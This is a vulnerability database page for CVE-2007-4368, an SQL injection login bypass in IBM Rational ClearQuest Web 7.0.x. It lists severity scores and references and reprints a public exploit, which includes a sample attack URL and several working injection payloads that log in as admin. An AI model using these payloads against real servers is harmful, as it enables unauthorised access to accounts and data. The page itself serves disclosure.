CVE-2007-4368
Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
SQL injection vulnerability in /main in IBM Rational ClearQuest (CQ) Web 7.0.0.0-IFIX02 and 7.0.0.1 allows remote attackers to execute arbitrary SQL commands via the username parameter in a GenerateMainFrame command.
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 4286
Publication date : 2007-08-13 22h00 +00:00
Author : s4squatch
EDB Verified : Yes
+==============================================================+
+ IBM Rational ClearQuest Web Login Bypass (SQL Injection) +
+==============================================================+
DISCOVERED BY:
==============
SecureState
sasquatch - swhite@securestate.com
rel1k - dkennedy@securestate.com
HOMEPAGE:
=========
www.securestate.com
AFFECTED AREA:
===============
The username field on the login page is where the application is susceptible to SQL injection...
SAMPLE URL:
===========
http://SERVERNAMEHERE/cqweb/main?command=GenerateMainFrame&ratl_userdb=DATABASENAMEHERE,&test=&clientServerAddress=http://SERVERNAMEHERE/cqweb/login&username='INJECTIONGOESHERE&password=PASSWORDHERE&schema=SCHEMEAHERE&userDb=DATABASENAMEHERE
Log in as "admin":
==================
' OR login_name LIKE '%admin%'--
(other variations work as well)
' OR login_name LIKE 'admin%'--
' OR LOWER(login_name) LIKE '%admin%'--
' OR LOWER(login_name) LIKE 'admin%'--
etc...use your imagination...
Confirmed against:
==================
version 7.0.0.1 Label BALTIC_PATCH.D0609.929
version 7.0.0.0-IFIX02 Label BALTIC_PATCH.D060630
FULL SQL Statement is spit back in error message:
=================================================
SELECT
master_users.master_dbid, master_users.login_name, master_users.encrypted_password,
master_users.email, master_users.fullname, master_users.phone, master_users.misc_info,
master_users.is_active, master_users.is_superuser, master_users.is_appbuilder,
master_users.is_user_maint, ratl_mastership, ratl_keysite, master_users.ratl_priv_mask
FROM
master_users
WHERE
login_name = 'INJECTION GOES HERE
# milw0rm.com [2007-08-14]
Products Mentioned
Configuraton 0
Ibm>>Rational_clearquest >> Version 7.0.0.0
- Ibm>>Rational_clearquest >> Version 7.0.0.0 (Open CPE detail)
Ibm>>Rational_clearquest >> Version 7.0.0.1
- Ibm>>Rational_clearquest >> Version 7.0.0.1 (Open CPE detail)
References
http://www.securityfocus.com/archive/1/476475/100/0/threaded
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
